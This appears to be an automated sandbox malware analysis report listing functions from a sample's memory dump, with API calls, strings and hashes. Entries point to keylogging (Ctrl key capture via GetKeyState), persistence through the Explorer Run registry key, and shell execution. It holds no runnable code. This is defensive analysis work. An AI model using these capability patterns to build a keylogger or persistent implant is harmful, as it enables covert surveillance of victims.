                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                          • Opcode Fuzzy Hash: 6a80a69b360d983d43fc671acba1cdd0286d48cffeca5b30a3a99feab9c297c2
                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: !D@$open
                                          • API String ID: 587946157-1586967515
                                          • Opcode ID: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                          • Opcode Fuzzy Hash: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                          APIs
                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State
                                          • String ID: [CtrlL]$[CtrlR]
                                          • API String ID: 1649606143-2446555240
                                          • Opcode ID: 68a21427a53fdb80c3da8a233085b44fd58d033cfb752835714686d39fb0ec3c
                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                          • Opcode Fuzzy Hash: 68a21427a53fdb80c3da8a233085b44fd58d033cfb752835714686d39fb0ec3c
                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                          APIs
                                            • Part of subcall function 00449ADC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                            • Part of subcall function 00449ADC: _free.LIBCMT ref: 00449B4C
                                            • Part of subcall function 00449B7C: _free.LIBCMT ref: 00449B9E
                                          • DeleteCriticalSection.KERNEL32(00654C08), ref: 0043C241
                                          • _free.LIBCMT ref: 0043C255
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$CriticalDeleteSection
                                          • String ID: (Le
                                          • API String ID: 1906768660-2819316628
                                          • Opcode ID: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                          • Instruction ID: 53b3c8965ed62865b06495ab0c988fe80dbb580c75aaeb32feec7d00177b517a
                                          • Opcode Fuzzy Hash: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                          • Instruction Fuzzy Hash: F8E04F328145208FEB71BB69FD4595A73E4EB4D325B12086FF80DA3165CAADAC809B4D
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: <kG$@kG
                                          • API String ID: 1881088180-1261746286
                                          • Opcode ID: 3005333bcecaffa700c7528d759515cdbab9def11ce6217a52740adfeea124d5
                                          • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                          • Opcode Fuzzy Hash: 3005333bcecaffa700c7528d759515cdbab9def11ce6217a52740adfeea124d5
                                          • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752E8,00475300,?,pth_unenc), ref: 00413A6C
                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                          APIs
                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectProcessSingleTerminateWait
                                          • String ID: pth_unenc
                                          • API String ID: 1872346434-4028850238
                                          • Opcode ID: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                          • Instruction ID: 4cc810616d40180dbd1e9271652f71629269b6e9fac0605c61d014a2f2010889
                                          • Opcode Fuzzy Hash: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                          • Instruction Fuzzy Hash: B0D0C934189712EBD7220B70AE49B443A6CA705322F141360F429413F1C6A98894AA18
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CommandLine
                                          • String ID: 8(c
                                          • API String ID: 3253501508-1558180722
                                          • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                          • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                          • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                          • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                          • GetLastError.KERNEL32 ref: 00440D85
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast
                                          • String ID:
                                          • API String ID: 1717984340-0
                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99